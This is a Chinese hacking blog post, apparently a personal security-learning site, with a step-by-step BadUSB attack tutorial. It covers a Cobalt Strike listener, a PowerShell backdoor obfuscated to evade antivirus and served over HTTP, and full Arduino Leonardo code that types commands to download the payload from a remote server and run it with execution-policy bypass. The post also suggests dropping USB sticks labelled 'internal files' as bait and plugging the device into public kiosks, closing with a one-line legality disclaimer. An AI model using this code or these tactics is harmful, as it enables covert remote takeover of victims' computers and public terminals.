<!DOCTYPE html>


<html lang="zh-Hans">
  

    <head>
      <meta charset="utf-8" />
        
      <meta name="description" content="这是一个用来学安全的博客" />
      
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>HackDemo钓鱼篇②——U盘钓鱼 |  DMKXY&#39;s Blog</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/16.png" />
       
<link rel="stylesheet" href="/dist/main.css">

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css"
      />
      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    </head>
  </html>
</html>


<body>
  <div id="app">
    
      
      <canvas width="1777" height="841"
        style="position: fixed; left: 0px; top: 0px; z-index: 99999; pointer-events: none;"></canvas>
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-HackDemo钓鱼篇②——U盘钓鱼"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  HackDemo钓鱼篇②——U盘钓鱼
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2022/06/10/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/" class="article-date">
  <time datetime="2022-06-10T04:30:26.000Z" itemprop="datePublished">2022-06-10</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E7%A4%BE%E5%B7%A5%E5%AE%89%E5%85%A8/">社工安全</a> / <a class="article-category-link" href="/categories/%E7%A4%BE%E5%B7%A5%E5%AE%89%E5%85%A8/%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">环境搭建</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">1.3k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">5 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h3 id="背景介绍"><a href="#背景介绍" class="headerlink" title="背景介绍"></a>背景介绍</h3><p>最近接触到各种钓鱼方法，研究到U盘钓鱼的时候，决定搞个BadUSB玩玩。BadUSB 漏洞是由安全研究人员Karsten Nohl 和 Jakob Lell 在 2014 年黑帽会议上首次发现并暴露出来的，这也就让USB安全和几乎所有和USB相关的设备（包括具有USB端口的电脑）都陷入相当危险的状态。</p>
<p>就狭义来说，BadUSB是指形似 U 盘的设备，内部的电路在上电之后会被系统识别为键盘，此时该设备内部的芯片开始与电脑进行键盘通讯，仿照人的输入习惯，来操作电脑，以此达到骇入电脑的目的。</p>
<p>就广义来说，BadUSB是指一切会被电脑识别为 HID 设备的，外观却不像键盘的电子设备。现阶段有的 BadUSB是形似数据线的，有的则是手机加定制内核，以发挥 BadUSB 的作用，更有甚者，将 BadUSB 开发为模块，可以嵌入任意的带 USB 接口的设备中。</p>
<a id="more"></a>

<h3 id="实现工具及环境"><a href="#实现工具及环境" class="headerlink" title="实现工具及环境"></a>实现工具及环境</h3><ul>
<li><p>BadUSB Leonardo开发板</p>
</li>
<li><p>Arduino IDE_v1.8.5</p>
</li>
<li><p>Cobalt Strike 4.0</p>
</li>
<li><p>Server酱</p>
</li>
<li><p>Ubuntu 20.04.4(CS服务端、木马服务器)、Windows10(CS客户端)、Windows10(受害者)</p>
<p>链接：<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1UQI9GldqY8T3CIRrmDy7Pw">https://pan.baidu.com/s/1UQI9GldqY8T3CIRrmDy7Pw</a><br>提取码：r1c4</p>
</li>
</ul>
<h3 id="复现步骤"><a href="#复现步骤" class="headerlink" title="复现步骤"></a>复现步骤</h3><h4 id="前期准备"><a href="#前期准备" class="headerlink" title="前期准备"></a>前期准备</h4><p>Cobalt Strike启动服务端</p>
<pre class="line-numbers language-none"><code class="language-none">.&#x2F;teamserver xxx.xxx.xxx 123456<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/1.png" alt="图片"></p>
<p>Cobalt Strike客户端登录，添加监听器</p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/2.png" alt="图片"></p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/3.png" alt="图片"></p>
<p>受害机为Windows系统，对于exe的木马会比较敏感，所以我们生成powershell的木马</p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/4.png" alt="图片"></p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/5.png" alt="图片"></p>
<p>保存在桌面命名为payload.ps1，需要对这个马做一下免杀，PowerShell的免杀可以用Invoke-Obfuscation，进入目录执行powershell命令</p>
<pre class="line-numbers language-none"><code class="language-none">set-executionpolicy remotesigned
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/6.png" alt="图片"></p>
<p>然后执行命令，指定待处理的Ps1文件</p>
<p>或者指定待处理的ps代码</p>
<pre class="line-numbers language-none"><code class="language-none">set scriptpath c:\xxx\payload.ps1
set scriptblock &#39;echo xss&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>输入encoding 并选择编码方式，比如1，这里我选择混淆两次ascii 按两次1两次回车就完事儿了</p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/7.png" alt="图片"></p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/8.png" alt="图片"></p>
<p>导出免杀ps文件到指定路径</p>
<pre class="line-numbers language-none"><code class="language-none">out C:\xxx\xxx.ps1<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>到这里简单的免杀完成了，将这个马放到远程服务器上备用，我们可以用以下命令启动内置的Apache服务器，使受害者可以下载木马。访问可以看到服务器上的马</p>
<pre class="line-numbers language-none"><code class="language-none">python -m SimpleHTTPServer 9899<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/9.png" alt="图片"></p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/10.png" alt="图片"></p>
<h4 id="烧录制作"><a href="#烧录制作" class="headerlink" title="烧录制作"></a>烧录制作</h4><p>下面我们可以进行badusb开发板的烧录</p>
<p>将硬件插入电脑，查看一下对应端口</p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/11.png" alt="图片"></p>
<p>打开Arduino IDE，工具-&gt;板-&gt;选择”Arduino Leonardo”和对应端口</p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/12.png" alt="图片"></p>
<p>将以下代码粘贴到arduino</p>
<pre class="line-numbers language-none"><code class="language-none">#include&lt;Keyboard.h&gt;
void setup() &#123;
  &#x2F;&#x2F; putpower shell your setup code here, to run once
  Keyboard.begin();&#x2F;&#x2F;开始键盘通讯 
delay(3000);&#x2F;&#x2F;延时 
Keyboard.press(KEY_LEFT_GUI);&#x2F;&#x2F;win键 
delay(500);
Keyboard.press(&#39;r&#39;);&#x2F;&#x2F;r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release(&#39;r&#39;); 
Keyboard.press(KEY_CAPS_LOCK);&#x2F;&#x2F;利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println(&quot;CMD  &#x2F;q &#x2F;d &#x2F;f:off &#x2F;v:on &#x2F;k MODE con: cols&#x3D;15 lines&#x3D;1&quot;);  &#x2F;&#x2F;无回显
&#x2F;&#x2F;Keyboard.println(&quot;cmd &#x2F;T:01 &#x2F;K \&quot;@echo off &amp;&amp; mode con:COLS&#x3D;15 LINES&#x3D;1\&quot;&quot;);   &#x2F;&#x2F;有回显
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(2000);
Keyboard.println(&quot;powershell\n&quot;);
Keyboard.println(&quot;$clnt &#x3D; new-object system.net.webclient;\n&quot;);
Keyboard.println(&quot;$url&#x3D; &#39;http:&#x2F;&#x2F;xxx.xxx.xxx:xxxx&#x2F;payload.ps1&#39;;\n&quot;);  &#x2F;&#x2F;远程服务器ps1远控地址
Keyboard.println(&quot;$file &#x3D; &#39;d:\\xxx.ps1&#39;;\n&quot;);      &#x2F;&#x2F;下载到目标存放文件的地址
Keyboard.println(&quot;$clnt.downloadfile($url,$file)\n&quot;);  &#x2F;&#x2F;采用分段执行绕过防火墙进程防护
Keyboard.println(&quot;powershell.exe -executionpolicy bypass -file d:\\xxx.ps1&quot;); &#x2F;&#x2F;本地权限绕过执行木马脚本
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();&#x2F;&#x2F;结束键盘通讯 
&#125;
 
void loop() &#123;
  &#x2F;&#x2F; put your main code here, to run repeatedly:
 
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>代码大体意思：</p>
<ul>
<li>插入BadUsb后等待3秒</li>
<li>按下Windows+R</li>
<li>切换大写绕开输入法</li>
<li>模拟输入字符串，最小化打开cmd窗口</li>
<li>隐藏输入特定命令，下载远控并调用powershell执行</li>
</ul>
<p>进行烧录程序，先点击第一个编译按钮，无误以后点击第二个进行烧录，等下面的进度条跑完，提示完成</p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/13.png" alt="图片"></p>
<h4 id="上线测试"><a href="#上线测试" class="headerlink" title="上线测试"></a>上线测试</h4><p>电脑插入BadUSB，桌面会有些许痕迹</p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/14.png" alt="图片"></p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/15.png" alt="图片"></p>
<p>会有一个很小的cmd窗口，放大里边没任何内容</p>
<p>可以看到安全软件也不报毒</p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/16.png" alt="图片"></p>
<p>打开CobaltStrike，发现已经上线</p>
<p><img src="/images/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/17.png" alt="图片"></p>
<h4 id="攻击场景"><a href="#攻击场景" class="headerlink" title="攻击场景"></a>攻击场景</h4><h5 id="1-社工攻击"><a href="#1-社工攻击" class="headerlink" title="1.社工攻击"></a>1.社工攻击</h5><p>把badusb放到一些显眼的地方或者放在地上装有人不小心掉了，可以在表面贴一些贴纸或者写着”内部文件“、”个人资料“等的标签，引诱受害者插入电脑</p>
<h5 id="2-带有usb的终端机"><a href="#2-带有usb的终端机" class="headerlink" title="2.带有usb的终端机"></a>2.带有usb的终端机</h5><p>各场所终端机器，找到USB接口怼进去，有许多是Windows系统，比如一些自助取票机</p>
<p>小伙伴们可以根据文章自行复现，但是千万不要做违法的行为哦！</p>
<h3 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h3><p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/UROx1fJOmMVbmH_-UasFEQ">https://mp.weixin.qq.com/s/UROx1fJOmMVbmH_-UasFEQ</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/hsKIR-KeXf0SrRl8-Fw_TQ">https://mp.weixin.qq.com/s/hsKIR-KeXf0SrRl8-Fw_TQ</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/NXNf4sHOSKyQ5ugABQuATw">https://mp.weixin.qq.com/s/NXNf4sHOSKyQ5ugABQuATw</a></p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://dmkxy.github.io/2022/06/10/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A1%E2%80%94%E2%80%94U%E7%9B%98%E9%92%93%E9%B1%BC/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/2022-6/" rel="tag">2022.6</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
    
      <a href="/2022/06/01/HackDemo%E9%92%93%E9%B1%BC%E7%AF%87%E2%91%A0%E2%80%94%E2%80%94WiFi%E9%92%93%E9%B1%BC/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">HackDemo钓鱼篇①——WiFi钓鱼</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "",
    app_key: "",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2019-2022
        <i class="ri-heart-fill heart_icon"></i> DMKXY
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/avatar.gif" alt="DMKXY&#39;s Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>欢迎师傅来交流对线~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->
 
<script src="/js/clickBoom2.js"></script>
 
<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->
 
<script src="/js/dz.js"></script>
 
<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    

  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"superSample":2,"width":150,"height":300,"position":"right","hOffset":80,"vOffset":-50},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false});</script></body>

</html>